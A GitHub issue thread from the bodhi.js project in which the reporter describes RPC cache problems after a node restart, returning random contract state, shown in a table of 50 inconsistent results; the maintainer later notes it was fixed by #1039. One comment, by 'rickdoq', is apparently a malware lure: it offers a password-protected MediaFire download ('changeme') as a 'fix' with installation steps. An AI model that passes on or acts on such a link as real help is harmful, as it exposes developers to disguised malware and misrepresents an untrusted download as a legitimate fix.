### ISSUE TITLE
cache issue

### ISSUE THREAD

**Issue by shunjizhan** [AcalaNetwork/bodhi.js#1014]
after node restarted, sometimes there will be some cache issue, rpc returning wrong (random) state. Need to do some digging for this.

Result seems to be random, no clear pattern

```
┌─────────┬─────────────────┬───────────────┬────────┬────────────────────────┐
│ (index) │ ticketRemaining │ timeRemaining │ isOpen │        entryFee        │
├─────────┼─────────────────┼───────────────┼────────┼────────────────────────┤
│    0    │       '0'       │    '73476'    │ false  │ '10000000000000000000' │
│    1    │       '0'       │    '73476'    │ false  │ '10000000000000000000' │
│    2    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│    3    │      '268'      │      '0'      │  true  │ '10000000000000000000' │
│    4    │      '268'      │    '73476'    │  true  │ '10000000000000000000' │
│    5    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│    6    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│    7    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│    8    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│    9    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│   10    │      '268'      │    '73476'    │  true  │ '10000000000000000000' │
│   11    │      '268'      │      '0'      │ false  │ '10000000000000000000' │
│   12    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│   13    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│   14    │      '268'      │    '73476'    │  true  │ '10000000000000000000' │
│   15    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│   16    │      '268'      │      '0'      │  true  │ '10000000000000000000' │
│   17    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│   18    │       '0'       │    '73476'    │ false  │ '10000000000000000000' │
│   19    │      '268'      │    '73476'    │  true  │ '10000000000000000000' │
│   20    │      '268'      │    '73476'    │  true  │ '10000000000000000000' │
│   21    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│   22    │      '268'      │      '0'      │  true  │ '10000000000000000000' │
│   23    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│   24    │      '268'      │    '73476'    │  true  │ '10000000000000000000' │
│   25    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│   26    │      '268'      │    '73476'    │  true  │ '10000000000000000000' │
│   27    │       '0'       │      '0'      │  true  │ '10000000000000000000' │
│   28    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│   29    │       '0'       │    '73476'    │ false  │ '10000000000000000000' │
│   30    │      '268'      │      '0'      │  true  │ '10000000000000000000' │
│   31    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│   32    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│   33    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│   34    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│   35    │      '268'      │    '73476'    │  true  │ '10000000000000000000' │
│   36    │      '268'      │      '0'      │  true  │ '10000000000000000000' │
│   37    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│   38    │      '268'      │      '0'      │  true  │ '10000000000000000000' │
│   39    │      '268'      │      '0'      │ false  │ '10000000000000000000' │
│   40    │       '0'       │      '0'      │  true  │ '10000000000000000000' │
│   41    │      '268'      │      '0'      │  true  │ '10000000000000000000' │
│   42    │      '268'      │      '0'      │  true  │ '10000000000000000000' │
│   43    │      '268'      │      '0'      │  true  │ '10000000000000000000' │
│   44    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
│   45    │      '268'      │    '73476'    │  true  │ '10000000000000000000' │
│   46    │      '268'      │      '0'      │ false  │ '10000000000000000000' │
│   47    │       '0'       │    '73476'    │ false  │ '10000000000000000000' │
│   48    │       '0'       │    '73476'    │  true  │ '10000000000000000000' │
│   49    │      '268'      │    '73476'    │ false  │ '10000000000000000000' │
└─────────┴─────────────────┴───────────────┴────────┴────────────────────────┘
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by shunjizhan** [comment]
fixed by #1039
